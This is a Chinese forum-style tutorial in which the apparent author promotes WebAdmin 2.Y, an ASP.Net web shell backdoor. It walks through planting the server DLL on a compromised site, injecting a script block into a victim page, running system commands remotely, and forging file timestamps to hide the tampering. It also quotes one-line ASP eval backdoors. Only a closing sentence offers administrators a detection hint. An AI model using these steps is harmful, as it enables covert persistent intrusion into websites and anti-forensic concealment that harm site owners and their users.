什麼是WebAdmin後門？

各位網友好，不知道各位有沒有用過偶的WebAdmin 2.X？嗯，對啦，就是那個ASP.Net環境下的後門。那是我不成熟的作品，要是有什麼不順手的地方還希望多多包涵。呵呵，今天呢，還是讓偶來「黃婆賣瓜自賣自誇」吧，給大家介紹一下WebAdmin的大家好，不知道各位有沒有用過偶的WebAdmin 2.X？嗯，對啦，就是那個ASP.Net環境下的後門。那是我不成熟的作品，要是有什麼不順手的地方還希望多多包涵。呵呵，今天呢，還是讓偶來「黃婆賣瓜自賣自誇」吧，給大家介紹一下WebAdmin的最新版本——WebAdmin 2.Y。

WebAdmin 2.Y功能上與2.X大致一樣，不過2.Y是C/S版本。呵呵，C/S是大勢所趨嘛。C/S的好處就是能把很短的一段代碼插入正常文件、POST方式控制不留痕迹，真是殺人滅口、居家旅行的必備良藥啊。

廢話少說，看看使用說明先。

既然是ASP.Net下的後門，當然要求ASP.Net環境。一般來說，Windows2003是默認支持的，Windows2000/XP需要安裝.Net FrameWork。

玩過ASP下C/S後門的朋友都該知道，它的C/S後門放置很簡單，就是隨便找個ASP文件添加代碼「execute request("s")」或「eval request("s")」進去就是，十分簡單。這是利用了函數execute的功能就是執行代碼，但在ASP.Net下沒有類似函數，實現C/S要複雜一點。

在ASP.Net環境下可以把代碼編譯成dll文件以提高執行效率，這個就類似ASP下的組件機制，不過這裡是不用註冊的，只需要把編譯好的dll放在網站根目錄的bin目錄之下即可調用自己開發的組件。

WebAdmin2.Y就是基於這種組件思想，服務端dll呢就是你現在看到的WebAdmin2Y.dll，這個文件端要放在被控網站Web目錄的bin子目錄之下。有些系統的Web目錄下沒有bin文件夾，那我們給它新建一個就是；代碼就包含在SampleCSharp.aspx和SampleVB.aspx里。因為ASPX文件可以用VB.Net或C#編寫，所以SampleCSharp.aspx里包含的是C#的代碼，而SampleVB.aspx就是VB.Net的代碼了。使用時根據實際情況選擇之。

那個webadmin2y.htm就是客戶端了，本地使用。界面全是英文，不要罵我崇洋媚外呀，其實主要目的是為了練練英文，呵呵，你也跟著練練吧^_^

是不是腦子裡暈乎乎的？好，下面我給個實例給大家看看這個東東到底怎麼用。

偶在本地搭建了個IIS5.1+.Net FrameWork的環境，Web目錄在E:MyWeb。我們要留後門的系統是動網新聞4.1（ASP.Net程序），它的位置是E:MyWebdvnews。動網新聞的N多dll文件在安裝的時候被要求放置在Web目錄的bin目錄下（即E:MyWebin）。

假設偶已經入侵了本地主機，現在我想用WebAdmin 2.Y留個C/S Web後門。

首先，應該把WebAdmin2Y.dll這個dll文件放到Web目錄的bin目錄下（這裡是E:MyWebin），注意名字WebAdmin2Y.dll不要亂改喲，改了就不行了。

接著我們要找個受害文件，一般是.aspx。呵呵，這裡我順手就把mail.aspx選中了（真可憐～～）。因為動網新聞是用C#寫的，所以我要用到SampleCSharp.aspx里的代碼。

現在打開文件mail.aspx，看到它的第一行是ASP.Net的頭（以「<%@」開始），這個偶們惹不起，不要動它，在它後面（ASP.Net頭之後html標記之前，這裡是第2行）插入SampleCSharp.aspx里的代碼：

<script language="C#" runat="server">

WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");

</script>

這裡還要羅嗦兩句：如果你要修改的aspx文件裡面含有「<script runat="server">……</script>」標籤的話，你就不需要再複製script標籤了——因為一個aspx文件只能有一個「<script runat="server">……</script>」。編輯文件前最好備個份，小心留後門失敗把人家的網站搞砸了。

呵呵，現在後門已經留好了，偶直接訪問mail.aspx文件試試（圖1）。

在直接訪問的情況下顯示正常頁面，ok！

現在偶們運行客戶端（就是那個webadmin2y.htm，圖2）

呵呵，還是先介紹一下客戶端界面。

「The URL」就是你的後門地址啦，這裡我們應該填「http://127.0.0.1/dvnews/mail.aspx」；「Password」自然就是你的密碼了。不知道各位注意到沒有，剛才我們在mail.aspx文件留下的代碼里有個類似MD5的東東——「add6bb58e139be10」。呵呵，它就是你的密碼。這個密碼怎麼得到呢？客戶端主界面有個「Get Your Encode Password」鏈接，你點擊它就會彈出個頁面來獲取你自己的密碼（圖3）。這裡的「add6bb58e139be10」就是「webadmin」。演算法很簡單，就是取密碼的MD5值的前16位（不是該取中間16位嗎？嘿嘿，我故意的）。

「Function」就是功能列表了，這裡的功能包括ABOUT（關於）、Attributes（查看和修改文件屬性，新增的）、Command（執行CMD）、CloneTime（克隆時間）、Copy File&Folder（複製）、Database（操作MSSQL或者Access資料庫）、Delete（刪除）、Edit TextFile（編輯）、File List（列目錄）、New File&Folder（新建）、ReadReg（讀註冊表）、Rename（重命名）、SQLRootKit、Server Variable（基本信息）、UploadFile（上傳）、DownLoad File（下載）。你選擇相應的功能，填好下面的表單內容點「Send」就OK了。

比如現在我執行「net user」這個命令（圖4，圖5）

呵呵，看到結果了吧。這裡只是給大家一個演示，WebAdmin2.Y更多的功能還是需要你自己下去試哦。

嘿嘿，最後提醒一下，客戶端有個CloneTime功能，可以把某個文件的創建、最後修改時間改得跟另一個文件一樣。快用它改掉你剛才修改的文件的時間吧^_^

對管理員或者殺毒軟體來說，對付WebAdmin2.Y最簡單的辦法是檢查bin下面有沒有WebAdmin2Y.dll這個文件，但是如果貿然刪除這個dll而不恢復被改動的文件就可能會造成網站應用程序崩潰，還請管理員大叔三思而行咯。